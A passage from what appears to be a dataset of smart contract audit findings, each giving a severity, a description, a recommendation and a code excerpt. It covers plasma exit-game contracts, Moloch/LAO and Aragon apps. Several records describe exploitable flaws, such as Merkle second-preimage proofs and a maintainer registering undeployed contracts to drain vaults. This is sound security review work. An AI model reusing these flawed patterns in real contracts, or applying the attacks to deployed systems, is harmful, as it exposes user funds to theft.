`isStandardFinalized` is not clearly an inclusion proof, and `isProtocolFinalized` simply adds confusion.\\n```\\nfunction checkInclusionProof(Model.Data memory data) private view returns (bool) {\\n if (data.inclusionProof.length == 0) {\\n return false;\\n }\\n\\n (bytes32 root,) = data.framework.blocks(data.txPos.blockNum());\\n bytes32 leafData = keccak256(data.txBytes);\\n return Merkle.checkMembership(\\n leafData, data.txPos.txIndex(), root, data.inclusionProof\\n );\\n}\\n```\\n\\nBy introducing the abstraction of `TxFinalizationVerifier`, the input validation performed by `Merkle` is split across multiple files, and the reasonable-seeming decision of calling `Merkle.checkMembership` directly becomes unsafe. In fact, this occurs in one location in the contracts:\\n```\\nfunction verifyAndDeterminePositionOfTransactionIncludedInBlock(\\n bytes memory txbytes,\\n UtxoPosLib.UtxoPos memory utxoPos,\\n bytes32 root,\\n bytes memory inclusionProof\\n)\\n private\\n pure\\n returns(uint256)\\n{\\n bytes32 leaf = keccak256(txbytes);\\n require(\\n Merkle.checkMembership(leaf, utxoPos.txIndex(), root, inclusionProof),\\n ""Transaction is not included in block of Plasma chain""\\n );\\n\\n return utxoPos.value;\\n}\\n```\\n","PaymentChallengeIFEOutputSpent.verifyInFlightTransactionStandardFinalized:\\n```\\nrequire(controller.txFinalizationVerifier.isStandardFinalized(finalizationData), ""In-flight transaction not finalized"");\\n```\\n\\nPaymentChallengeIFENotCanonical.verifyCompetingTxFinalized:\\n```\\nrequire(self.txFinalizationVerifier.isStandardFinalized(finalizationData), ""Failed to verify the position of competing tx"");\\n```\\n\\nPaymentStartInFlightExit.verifyInputTransactionIsStandardFinalized:\\n```\\nrequire(exitData.controller.txFinalizationVerifier.isStandardFinalized(finalizationData),\\n ""Input transaction is not standard finalized"");\\n```\\n\\nIf none of the above recommendations are implemented, ensure that `PaymentChallengeIFENotCanonical` 
uses the abstraction `TxFinalizationVerifier` so that a length check is performed on the inclusion proof.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/471",,"```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is ""standard finalized""\\n\\* @dev MVP: requires that both inclusion proof and confirm signature is checked\\n\\* @dev MoreVp: checks inclusion proof only\\n\\*/\\nfunction isStandardFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return checkInclusionProof(data);\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(""MVP is not yet supported"");\\n } else {\\n revert(""Invalid protocol value"");\\n }\\n}\\n```\\n" +Merkle - The implementation does not enforce inclusion of leaf nodes.,medium,"An observation with the current Merkle tree implementation is that it may be possible to validate nodes other than leaves. This is done by providing `checkMembership` with a reference to a hash within the tree, rather than a leaf.\\n```\\n/\\*\\*\\n \\* @notice Checks that a leaf hash is contained in a root hash\\n \\* @param leaf Leaf hash to verify\\n \\* @param index Position of the leaf hash in the Merkle tree\\n \\* @param rootHash Root of the Merkle tree\\n \\* @param proof A Merkle proof demonstrating membership of the leaf hash\\n \\* @return True, if the leaf hash is in the Merkle tree; otherwise, False\\n\\*/\\nfunction checkMembership(bytes32 leaf, uint256 index, bytes32 rootHash, bytes memory proof)\\n internal\\n pure\\n returns (bool)\\n{\\n require(proof.length % 32 == 0, ""Length of Merkle proof must be a multiple of 32"");\\n\\n bytes32 proofElement;\\n bytes32 computedHash = leaf;\\n uint256 j = index;\\n // Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\n for (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n 
assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(proofElement, computedHash));\\n }\\n j = j / 2;\\n }\\n\\n return computedHash == rootHash;\\n}\\n```\\n\\nThe current implementation will validate the provided “leaf” and return `true`. This is a known problem of Merkle trees https://en.wikipedia.org/wiki/Merkle_tree#Second_preimage_attack.\\nProvide a hash from within the Merkle tree as the `leaf` argument. The index has to match the index of that node in regards to its current level in the tree. The `rootHash` has to be the correct Merkle tree `rootHash`. The proof has to skip the necessary number of levels because the nodes “underneath” the provided “leaf” will not be processed.",A remediation needs a fixed Merkle tree size as well as the addition of a byte prepended to each node in the tree. Another way would be to create a structure for the Merkle node and mark it as `leaf` or no `leaf`.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/425,,"```\\n/\\*\\*\\n \\* @notice Checks that a leaf hash is contained in a root hash\\n \\* @param leaf Leaf hash to verify\\n \\* @param index Position of the leaf hash in the Merkle tree\\n \\* @param rootHash Root of the Merkle tree\\n \\* @param proof A Merkle proof demonstrating membership of the leaf hash\\n \\* @return True, if the leaf hash is in the Merkle tree; otherwise, False\\n\\*/\\nfunction checkMembership(bytes32 leaf, uint256 index, bytes32 rootHash, bytes memory proof)\\n internal\\n pure\\n returns (bool)\\n{\\n require(proof.length % 32 == 0, ""Length of Merkle proof must be a multiple of 32"");\\n\\n bytes32 proofElement;\\n bytes32 computedHash = leaf;\\n uint256 j = index;\\n // Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\n for (uint256 
i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(proofElement, computedHash));\\n }\\n j = j / 2;\\n }\\n\\n return computedHash == rootHash;\\n}\\n```\\n" +Maintainer can bypass exit game quarantine by registering not-yet-deployed contracts,medium,"The plasma framework uses an `ExitGameRegistry` to allow the maintainer to add new exit games after deployment. An exit game is any arbitrary contract. In order to prevent the maintainer from adding malicious exit games that steal user funds, the framework uses a “quarantine” system whereby newly-registered exit games have restricted permissions until their quarantine period has expired. The quarantine period is by default `3 * minExitPeriod`, and is intended to facilitate auditing of the new exit game's functionality by the plasma users.\\nHowever, by registering an exit game at a contract which has not yet been deployed, the maintainer can prevent plasma users from auditing the game until the quarantine period has expired. After the quarantine period has expired, the maintainer can deploy the malicious exit game and immediately steal funds.\\nExplanation\\nExit games are registered in the following function, callable only by the plasma contract maintainer:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. 
Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, ""Should not register with tx type 0"");\\n require(\\_contract != address(0), ""Should not register with an empty exit game address"");\\n require(\\_exitGames[\\_txType] == address(0), ""The tx type is already registered"");\\n require(\\_exitGameToTxType[\\_contract] == 0, ""The exit game contract is already registered"");\\n require(Protocol.isValidProtocol(\\_protocol), ""Invalid protocol value"");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nNotably, the function does not check the `extcodesize` of the submitted contract. 
As such, the maintainer can submit the address of a contract which does not yet exist and is not auditable.\\nAfter at least `3 * minExitPeriod` seconds pass, the submitted contract now has full permissions as a registered exit game and can pass all checks using the `onlyFromNonQuarantinedExitGame` modifier:\\n```\\n/\\*\\*\\n \\* @notice A modifier to verify that the call is from a non-quarantined exit game\\n \\*/\\nmodifier onlyFromNonQuarantinedExitGame() {\\n require(\\_exitGameToTxType[msg.sender] != 0, ""The call is not from a registered exit game contract"");\\n require(!\\_exitGameQuarantine.isQuarantined(msg.sender), ""ExitGame is quarantined"");\\n \\_;\\n}\\n```\\n\\nAdditionally, the submitted contract passes checks made by external contracts using the `isExitGameSafeToUse` function:\\n```\\n/\\*\\*\\n \\* @notice Checks whether the contract is safe to use and is not under quarantine\\n \\* @dev Exposes information about exit games quarantine\\n \\* @param \\_contract Address of the exit game contract\\n \\* @return boolean Whether the contract is safe to use and is not under quarantine\\n \\*/\\nfunction isExitGameSafeToUse(address \\_contract) public view returns (bool) {\\n return \\_exitGameToTxType[\\_contract] != 0 && !\\_exitGameQuarantine.isQuarantined(\\_contract);\\n}\\n```\\n\\nThese permissions allow a registered quarantine to:\\nWithdraw any users' tokens from ERC20Vault:\\n```\\nfunction withdraw(address payable receiver, address token, uint256 amount) external onlyFromNonQuarantinedExitGame {\\n IERC20(token).safeTransfer(receiver, amount);\\n emit Erc20Withdrawn(receiver, token, amount);\\n}\\n```\\n\\nWithdraw any users' ETH from EthVault:\\n```\\nfunction withdraw(address payable receiver, uint256 amount) external onlyFromNonQuarantinedExitGame {\\n // we do not want to block exit queue if transfer is unucessful\\n // solhint-disable-next-line avoid-call-value\\n (bool success, ) = receiver.call.value(amount)("""");\\n if (success) 
{\\n emit EthWithdrawn(receiver, amount);\\n } else {\\n emit WithdrawFailed(receiver, amount);\\n }\\n```\\n\\nActivate and deactivate the `ExitGameController` reentrancy mutex:\\n```\\nfunction activateNonReentrant() external onlyFromNonQuarantinedExitGame() {\\n require(!mutex, ""Reentrant call"");\\n mutex = true;\\n}\\n```\\n\\n```\\nfunction deactivateNonReentrant() external onlyFromNonQuarantinedExitGame() {\\n require(mutex, ""Not locked"");\\n mutex = false;\\n}\\n```\\n\\n`enqueue` arbitrary exits:\\n```\\nfunction enqueue(\\n uint256 vaultId,\\n address token,\\n uint64 exitableAt,\\n TxPosLib.TxPos calldata txPos,\\n uint160 exitId,\\n IExitProcessor exitProcessor\\n)\\n external\\n onlyFromNonQuarantinedExitGame\\n returns (uint256)\\n{\\n bytes32 key = exitQueueKey(vaultId, token);\\n require(hasExitQueue(key), ""The queue for the (vaultId, token) pair is not yet added to the Plasma framework"");\\n PriorityQueue queue = exitsQueues[key];\\n\\n uint256 priority = ExitPriority.computePriority(exitableAt, txPos, exitId);\\n\\n queue.insert(priority);\\n delegations[priority] = exitProcessor;\\n\\n emit ExitQueued(exitId, priority);\\n return priority;\\n}\\n```\\n\\nFlag outputs as “spent”:\\n```\\nfunction flagOutputSpent(bytes32 \\_outputId) external onlyFromNonQuarantinedExitGame {\\n require(\\_outputId != bytes32(""""), ""Should not flag with empty outputId"");\\n isOutputSpent[\\_outputId] = true;\\n}\\n```\\n",`registerExitGame` should check that `extcodesize` of the submitted contract is non-zero.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/410,,"```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. 
Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, ""Should not register with tx type 0"");\\n require(\\_contract != address(0), ""Should not register with an empty exit game address"");\\n require(\\_exitGames[\\_txType] == address(0), ""The tx type is already registered"");\\n require(\\_exitGameToTxType[\\_contract] == 0, ""The exit game contract is already registered"");\\n require(Protocol.isValidProtocol(\\_protocol), ""Invalid protocol value"");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n" +EthVault - Unused state variable,low,The state variable `withdrawEntryCounter` is not used in the code.\\n```\\nuint256 private withdrawEntryCounter = 0;\\n```\\n,Remove it from the contract.,,```\\nuint256 private withdrawEntryCounter = 0;\\n```\\n +ECDSA error value is not handled,low,"Resolution\\nThis was addressed in commit 32288ccff5b867a7477b4eaf3beb0587a4684d7a by adding a check that the returned value is nonzero.\\nThe OpenZeppelin `ECDSA` library returns `address(0x00)` for many cases with malformed signatures:\\n```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n return address(0);\\n}\\n\\nif (v != 27 && v != 28) {\\n return address(0);\\n}\\n```\\n\\nThe `PaymentOutputToPaymentTxCondition` contract does not explicitly handle this case:\\n```\\naddress payable owner = 
inputTx.outputs[outputIndex].owner();\\nrequire(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), ""Tx in not signed correctly"");\\n\\nreturn true;\\n```\\n",Adding a check to handle this case will make it easier to reason about the code.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/454,,```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n return address(0);\\n}\\n\\nif (v != 27 && v != 28) {\\n return address(0);\\n}\\n```\\n +No existence checks on framework block and timestamp reads,low,"The exit game libraries make several queries to the main `PlasmaFramework` contract where plasma block hashes and timestamps are stored. In multiple locations, the return values of these queries are not checked for existence.\\nPaymentStartStandardExit.setupStartStandardExitData:\\n```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n\\nPaymentChallengeIFENotCanonical.respond:\\n```\\n(bytes32 root, ) = self.framework.blocks(utxoPos.blockNum());\\n```\\n\\nPaymentPiggybackInFlightExit.enqueue:\\n```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n\\nTxFinalizationVerifier.checkInclusionProof:\\n```\\n(bytes32 root,) = data.framework.blocks(data.txPos.blockNum());\\n```\\n","Although none of these examples seem exploitable, adding existence checks makes it easier to reason about the code. 
Each query to `PlasmaFramework.blocks` should be followed with a check that the returned value is nonzero.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/463",,"```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n" +BondSize - effectiveUpdateTime should be uint64,low,"In BondSize, the mechanism to update the size of the bond has a grace period after which the new bond size becomes active.\\nWhen updating the bond size, the time is casted as a `uint64` and saved in a `uint128` variable.\\n```\\nuint128 effectiveUpdateTime;\\n```\\n\\n```\\nuint64 constant public WAITING\\_PERIOD = 2 days;\\n```\\n\\n```\\nself.effectiveUpdateTime = uint64(now) + WAITING\\_PERIOD;\\n```\\n\\nThere's no need to use a `uint128` to save the time if it never will take up that much space.",Change the type of the `effectiveUpdateTime` to `uint64`.\\n```\\n- uint128 effectiveUpdateTime;\\n+ uint64 effectiveUpdateTime;\\n```\\n,,```\\nuint128 effectiveUpdateTime;\\n```\\n +PaymentExitGame contains several redundant plasmaFramework declarations,low,"`PaymentExitGame` inherits from both `PaymentInFlightExitRouter` and `PaymentStandardExitRouter`. All three contracts declare and initialize their own `PlasmaFramework` variable. This pattern can be misleading, and may lead to subtle issues in future versions of the code.\\n`PaymentExitGame` declaration:\\n```\\nPlasmaFramework private plasmaFramework;\\n```\\n\\n`PaymentInFlightExitRouter` declaration:\\n```\\nPlasmaFramework private framework;\\n```\\n\\n`PaymentStandardExitRouter` declaration:\\n```\\nPlasmaFramework private framework;\\n```\\n\\nEach variable is initialized in the corresponding file's constructor.",Introduce an inherited contract common to `PaymentStandardExitRouter` and `PaymentInFlightExitRouter` with the `PlasmaFramework` variable. 
Make the variable internal so it is visible to inheriting contracts.,,```\\nPlasmaFramework private plasmaFramework;\\n```\\n +Creating proposal is not trustless in Pull Pattern,high,"Usually, if someone submits a proposal and transfers some amount of tribute tokens, these tokens are transferred back if the proposal is rejected. But if the proposal is not processed before the emergency processing, these tokens will not be transferred back to the proposer. This might happen if a tribute token or a deposit token transfers are blocked.\\n```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n ""failing vote token transfer failed""\\n );\\n```\\n\\nTokens are not completely lost in that case, they now belong to the LAO shareholders and they might try to return that money back. But that requires a lot of coordination and time and everyone who ragequits during that time will take a part of that tokens with them.","Resolution\\nthis issue no longer exists in the Pull Pattern update, due to the fact that emergency processing and in function ERC20 transfers are removed.\\nPull pattern for token transfers would solve the issue.",,"```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n ""failing vote token transfer failed""\\n );\\n```\\n" +Emergency processing can be blocked in Pull Pattern,high,"The main reason for the emergency processing mechanism is that there is a chance that some token transfers might be blocked. For example, a sender or a receiver is in the USDC blacklist. 
Emergency processing saves from this problem by not transferring tribute token back to the user (if there is some) and rejecting the proposal.\\n```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n ""failing vote token transfer failed""\\n );\\n```\\n\\nThe problem is that there is still a deposit transfer back to the sponsor and it could be potentially blocked too. If that happens, proposal can't be processed and the LAO is blocked.","Implementing pull pattern for all token withdrawals would solve the problem. The alternative solution would be to also keep the deposit tokens in the LAO, but that makes sponsoring the proposal more risky for the sponsor.",,"```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n ""failing vote token transfer failed""\\n );\\n```\\n" +Token Overflow might result in system halt or loss of funds,high,"If a token overflows, some functionality such as `processProposal`, `cancelProposal` will break due to safeMath reverts. The overflow could happen because the supply of the token was artificially inflated to oblivion.\\nThis issue was pointed out by Heiko Fisch in Telegram chat.\\nAny function using `internalTransfer()` can result in an overflow:\\n```\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256) {\\n return x >= y ? x : y;\\n}\\n```\\n","We recommend to allow overflow for broken or malicious tokens. This is to prevent system halt or loss of funds. 
It should be noted that in case an overflow occurs, the balance of the token will be incorrect for all token holders in the system.\\n`rageKick`, `rageQuit` were fixed by not using safeMath within the function code, however this fix is risky and not recommended, as there are other overflows in other functions that might still result in system halt or loss of funds.\\nOne suggestion is having a function named `unsafeInternalTransfer()` which does not use safeMath for the cases that overflow should be allowed. This mainly adds better readability to the code.\\nIt is still a risky fix and a better solution should be planned.",,"```\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256) {\\n return x >= y ? x : y;\\n}\\n```\\n" +Whitelisted tokens limit,high,"`_ragequit` function is iterating over all whitelisted tokens:\\n```\\nfor (uint256 i = 0; i < tokens.length; i++) {\\n uint256 amountToRagequit = fairShare(userTokenBalances[GUILD][tokens[i]], sharesAndLootToBurn, initialTotalSharesAndLoot);\\n // deliberately not using safemath here to keep overflows from preventing the function execution (which would break ragekicks)\\n // if a token overflows, it is because the supply was artificially inflated to oblivion, so we probably don't care about it anyways\\n userTokenBalances[GUILD][tokens[i]] -= amountToRagequit;\\n userTokenBalances[memberAddress][tokens[i]] += amountToRagequit;\\n}\\n```\\n\\nIf the number of tokens is too big, a transaction can run out of gas and all funds will be blocked forever. Ballpark estimation of this number is around 300 tokens based on the current OpCode gas costs and the block gas limit.","A simple solution would be just limiting the number of whitelisted tokens.\\nIf the intention is to invest in many new tokens over time, and it's not an option to limit the number of whitelisted tokens, it's possible to add a function that removes tokens from the whitelist. 
For example, it's possible to add a new type of proposals, that is used to vote on token removal if the balance of this token is zero. Before voting for that, shareholders should sell all the balance of that token.",,"```\\nfor (uint256 i = 0; i < tokens.length; i++) {\\n uint256 amountToRagequit = fairShare(userTokenBalances[GUILD][tokens[i]], sharesAndLootToBurn, initialTotalSharesAndLoot);\\n // deliberately not using safemath here to keep overflows from preventing the function execution (which would break ragekicks)\\n // if a token overflows, it is because the supply was artificially inflated to oblivion, so we probably don't care about it anyways\\n userTokenBalances[GUILD][tokens[i]] -= amountToRagequit;\\n userTokenBalances[memberAddress][tokens[i]] += amountToRagequit;\\n}\\n```\\n" +Whitelist proposal duplicate Won't Fix,low,"Every time when a whitelist proposal is sponsored, it's checked that there is no other sponsored whitelist proposal with the same token. This is done in order to avoid proposal duplicates.\\n```\\n// whitelist proposal\\nif (proposal.flags[4]) {\\n require(!tokenWhitelist[address(proposal.tributeToken)], ""cannot already have whitelisted the token"");\\n require(!proposedToWhitelist[address(proposal.tributeToken)], 'already proposed to whitelist');\\n proposedToWhitelist[address(proposal.tributeToken)] = true;\\n```\\n\\nThe issue is that even though you can't sponsor a duplicate proposal, you can still submit a new proposal with the same token.",Check that there is currently no sponsored proposal with the same token on proposal submission.,,"```\\n// whitelist proposal\\nif (proposal.flags[4]) {\\n require(!tokenWhitelist[address(proposal.tributeToken)], ""cannot already have whitelisted the token"");\\n require(!proposedToWhitelist[address(proposal.tributeToken)], 'already proposed to whitelist');\\n proposedToWhitelist[address(proposal.tributeToken)] = true;\\n```\\n" +Moloch - bool[6] flags can be changed to a dedicated structure 
Won't Fix,low,"The Moloch contract uses a structure that includes an array of bools to store a few flags about the proposal:\\n```\\nbool[6] flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\n\\nThis makes reasoning about the correctness of the code a bit complicated because one needs to remember what each item in the flag list stands for. To make the reader's life simpler a dedicated structure can be created that incorporates all of the required flags.\\n```\\n bool[6] memory flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\n","Based on the provided examples change the `bool[6] flags` to the proposed examples.\\nFlags as bool array with enum (proposed)\\nThis second contract implements the `flags` as a defined structure with each named element representing a specific flag. This method makes clear which flag is accessed because they are referred to by the name, not by the index.\\nThis third contract has the least amount of changes to the code and uses an enum structure to handle the index.\\n```\\npragma solidity 0.5.15;\\n\\ncontract FlagsEnum {\\n struct Proposal {\\n address applicant;\\n uint value;\\n bool[3] flags; // [sponsored, processed, kicked]\\n }\\n \\n enum ProposalFlags {\\n SPONSORED,\\n PROCESSED,\\n KICKED\\n }\\n \\n uint proposalCount;\\n \\n mapping(uint256 => Proposal) public proposals;\\n \\n function addProposal(uint \\_value, bool \\_sponsored, bool \\_processed, bool \\_kicked) public returns (uint) {\\n Proposal memory proposal = Proposal({\\n applicant: msg.sender,\\n value: \\_value,\\n flags: [\\_sponsored, \\_processed, \\_kicked]\\n });\\n \\n proposals[proposalCount] = proposal;\\n proposalCount += 1;\\n \\n return (proposalCount);\\n }\\n \\n function getProposal(uint \\_proposalId) public view returns (address, uint, bool, bool, bool) {\\n return (\\n proposals[\\_proposalId].applicant,\\n proposals[\\_proposalId].value,\\n 
proposals[\\_proposalId].flags[uint(ProposalFlags.SPONSORED)],\\n proposals[\\_proposalId].flags[uint(ProposalFlags.PROCESSED)],\\n proposals[\\_proposalId].flags[uint(ProposalFlags.KICKED)]\\n );\\n }\\n}\\n```\\n",,"```\\nbool[6] flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\n" +Passing duplicate tokens to Redemptions and TokenRequest may have unintended consequences,medium,"Both `Redemptions` and `TokenRequest` are initialized with a list of acceptable tokens to use with each app. For `Redemptions`, the list of tokens corresponds to an organization's treasury assets. For `TokenRequest`, the list of tokens corresponds to tokens accepted for payment to join an organization. Neither contract makes a uniqueness check on input tokens during initialization, which can lead to unintended behavior.\\nIn `Redemptions`, each of an organization's assets are redeemed according to the sender's proportional ownership in the org. The redemption process iterates over the `redeemableTokens` list, paying out the sender their proportion of each token listed:\\n```\\nfor (uint256 i = 0; i < redeemableTokens.length; i++) {\\n vaultTokenBalance = vault.balance(redeemableTokens[i]);\\n\\n redemptionAmount = \\_burnableAmount.mul(vaultTokenBalance).div(burnableTokenTotalSupply);\\n totalRedemptionAmount = totalRedemptionAmount.add(redemptionAmount);\\n\\n if (redemptionAmount > 0) {\\n vault.transfer(redeemableTokens[i], msg.sender, redemptionAmount);\\n }\\n}\\n```\\n\\nIf a token address is included more than once, the sender will be paid out more than once, potentially earning many times more than their proportional share of the token.\\nIn `TokenRequest`, this behavior does not allow for any significant deviation from expected behavior. 
It was included because the initialization process is similar to that of `Redemptions`.","Resolution\\nThis was addressed in Redemptions commit 2b0034206a5b9cdf239da7a51900e89d9931554f by checking `redeemableTokenAdded[token] == false` for each subsequent token added during initialization. Note that ordering is not enforced.\\nAdditionally, the issue in `TokenRequest` was addressed in commit eb4181961093439f142f2e74eb706b7f501eb5c0 by requiring that each subsequent token added during initialization has a value strictly greater than the previous token added.\\nDuring initialization in both apps, check that input token addresses are unique. One simple method is to require that token addresses are submitted in ascending order, and that each subsequent address added is greater than the one before.",,"```\\nfor (uint256 i = 0; i < redeemableTokens.length; i++) {\\n vaultTokenBalance = vault.balance(redeemableTokens[i]);\\n\\n redemptionAmount = \\_burnableAmount.mul(vaultTokenBalance).div(burnableTokenTotalSupply);\\n totalRedemptionAmount = totalRedemptionAmount.add(redemptionAmount);\\n\\n if (redemptionAmount > 0) {\\n vault.transfer(redeemableTokens[i], msg.sender, redemptionAmount);\\n }\\n}\\n```\\n" +The Delay app allows scripts to be paused even after execution time has elapsed,medium,"The `Delay` app is used to configure a delay between when an evm script is created and when it is executed. 
The entry point for this process is `Delay.delayExecution`, which stores the input script with a future execution date:\\n```\\nfunction \\_delayExecution(bytes \\_evmCallScript) internal returns (uint256) {\\n uint256 delayedScriptIndex = delayedScriptsNewIndex;\\n delayedScriptsNewIndex++;\\n\\n delayedScripts[delayedScriptIndex] = DelayedScript(getTimestamp64().add(executionDelay), 0, \\_evmCallScript);\\n\\n emit DelayedScriptStored(delayedScriptIndex);\\n\\n return delayedScriptIndex;\\n}\\n```\\n\\nAn auxiliary capability of the `Delay` app is the ability to “pause” the delayed script, which sets the script's `pausedAt` value to the current block timestamp:\\n```\\nfunction pauseExecution(uint256 \\_delayedScriptId) external auth(PAUSE\\_EXECUTION\\_ROLE) {\\n require(!\\_isExecutionPaused(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_PAUSE);\\n delayedScripts[\\_delayedScriptId].pausedAt = getTimestamp64();\\n\\n emit ExecutionPaused(\\_delayedScriptId);\\n}\\n```\\n\\nA paused script cannot be executed until `resumeExecution` is called, which extends the script's `executionTime` by the amount of time paused. Essentially, the delay itself is paused:\\n```\\nfunction resumeExecution(uint256 \\_delayedScriptId) external auth(RESUME\\_EXECUTION\\_ROLE) {\\n require(\\_isExecutionPaused(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_RESUME);\\n DelayedScript storage delayedScript = delayedScripts[\\_delayedScriptId];\\n\\n uint64 timePaused = getTimestamp64().sub(delayedScript.pausedAt);\\n delayedScript.executionTime = delayedScript.executionTime.add(timePaused);\\n delayedScript.pausedAt = 0;\\n\\n emit ExecutionResumed(\\_delayedScriptId);\\n}\\n```\\n\\nA delayed script whose execution time has passed and is not currently paused should be able to be executed via the `execute` function. 
However, the `pauseExecution` function still allows the aforementioned script to be paused, halting execution.",Add a check to `pauseExecution` to ensure that execution is not paused if the script's execution delay has already transpired.,,"```\\nfunction \\_delayExecution(bytes \\_evmCallScript) internal returns (uint256) {\\n uint256 delayedScriptIndex = delayedScriptsNewIndex;\\n delayedScriptsNewIndex++;\\n\\n delayedScripts[delayedScriptIndex] = DelayedScript(getTimestamp64().add(executionDelay), 0, \\_evmCallScript);\\n\\n emit DelayedScriptStored(delayedScriptIndex);\\n\\n return delayedScriptIndex;\\n}\\n```\\n" +Misleading intentional misconfiguration possible through misuse of newToken and newBaseInstance,medium,"The instantiation process for a Dandelion organization requires two separate external calls to `DandelionOrg`. There are two primary functions: `installDandelionApps`, and `newTokenAndBaseInstance`.\\n`installDandelionApps` relies on cached results from prior calls to `newTokenAndBaseInstance` and completes the initialization step for a Dandelion org.\\n`newTokenAndBaseInstance` is a wrapper around two publicly accessible functions: `newToken` and `newBaseInstance`. 
Called together, the functions:\\nDeploy a new `MiniMeToken` used to represent shares in an organization, and cache the address of the created token:\\n```\\n/\\*\\*\\n\\* @dev Create a new MiniMe token and save it for the user\\n\\* @param \\_name String with the name for the token used by share holders in the organization\\n\\* @param \\_symbol String with the symbol for the token used by share holders in the organization\\n\\*/\\nfunction newToken(string memory \\_name, string memory \\_symbol) public returns (MiniMeToken) {\\n MiniMeToken token = \\_createToken(\\_name, \\_symbol, TOKEN\\_DECIMALS);\\n \\_saveToken(token);\\n return token;\\n}\\n```\\n\\nCreate a new dao instance using Aragon's `BaseTemplate` contract:\\n```\\n/\\*\\*\\n\\* @dev Deploy a Dandelion Org DAO using a previously saved MiniMe token\\n\\* @param \\_id String with the name for org, will assign `[id].aragonid.eth`\\n\\* @param \\_holders Array of token holder addresses\\n\\* @param \\_stakes Array of token stakes for holders (token has 18 decimals, multiply token amount `\\* 10^18`)\\n\\* @param \\_useAgentAsVault Boolean to tell whether to use an Agent app as a more advanced form of Vault app\\n\\*/\\nfunction newBaseInstance(\\n string memory \\_id,\\n address[] memory \\_holders,\\n uint256[] memory \\_stakes,\\n uint64 \\_financePeriod,\\n bool \\_useAgentAsVault\\n)\\n public\\n{\\n \\_validateId(\\_id);\\n \\_ensureBaseSettings(\\_holders, \\_stakes);\\n\\n (Kernel dao, ACL acl) = \\_createDAO();\\n \\_setupBaseApps(dao, acl, \\_holders, \\_stakes, \\_financePeriod, \\_useAgentAsVault);\\n}\\n```\\n\\nSet up prepackaged Aragon apps, like `Vault`, `TokenManager`, and Finance:\\n```\\nfunction \\_setupBaseApps(\\n Kernel \\_dao,\\n ACL \\_acl,\\n address[] memory \\_holders,\\n uint256[] memory \\_stakes,\\n uint64 \\_financePeriod,\\n bool \\_useAgentAsVault\\n)\\n internal\\n{\\n MiniMeToken token = \\_getToken();\\n Vault 